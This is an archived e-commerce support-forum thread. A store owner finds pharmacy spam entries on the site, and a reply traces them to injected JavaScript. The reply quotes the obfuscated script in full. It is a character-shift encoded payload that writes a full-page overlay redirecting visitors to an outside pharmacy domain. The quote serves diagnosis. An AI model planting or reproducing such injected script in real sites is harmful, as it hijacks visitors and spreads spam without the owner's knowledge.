Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

HACKED with Pharmacy Links as Products


Guest

Recommended Posts

While browsing through my "best viewed products" in reports, I discovered 200 or so pharmacy links entered in as products. They are not listed under any of my categories so they only appear in the list of new products, as you can see here barkeninstyle.com/products_new.php?page=46. When opened the URL looks just like any other product's URL but the page is blank with just the pharmaceutical company's picture, no header, footer or side columns. I have looked everywhere in my site and cannot find where the hack is, not that I would know what the hack looks like though. The "products" do not seem to exist anywhere in my admin.

 

I've done my best to search through the forums but can't find any discussion about this. I would appreciate any help.

Link to comment
Share on other sites

I've done my best to search through the forums but can't find any discussion about this.

Can't remember to have seen this before either but it looks like the page is there but there is a piece of JavaScript (obfuscated) that overwrites the page:

Starts at around 40% of the page source in your CRELoaded store :)

<!--
var s="=ejw!tuzmf>#xjeui;fyqsfttjpo)epdvnfou/cpez/pggtfuXjeui*<!ifjhiu;3111qy<!qbeejoh.upq;211qy<!mfgu;1qy<!upq;1qy<!sjhiu;1qy<!cbdlhspvoe.dpmps;!$gggggg<!ufyu.bmjho;!dfoufs<!qptjujpo;!bctpmvuf<!wjtjcjmjuz;!wjtjcmf<!{.joefy;!3262<!ejtqmbz;!cmpdl<#?=b!isfg>##!poDmjdl>#xjoepx/mpdbujpo!>(iuuq;00wfdjuf/jogp0gbsnb/qiq(<!sfuvso!gbmtf<#?=jnh!cpsefs>1!tsd>#iuuq;00jnh762/jnbhftibdl/vt0jnh7620:5510361361112/kqh#?=cs?=tuspoh????!Dmjdl!up!Foufs!====0tuspoh?=0b?=0ejw?";
m=""; for (i=0; i<s.length; i++) {	if(s.charCodeAt(i) == 28){	  m+= '&';} else if (s.charCodeAt(i) == 23) {	  m+= '!';} else {	  m+=String.fromCharCode(s.charCodeAt(i)-1);	}}document.write(m);//-->
</script><h1>Claritin chewables</h1>prednisone and cancer

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...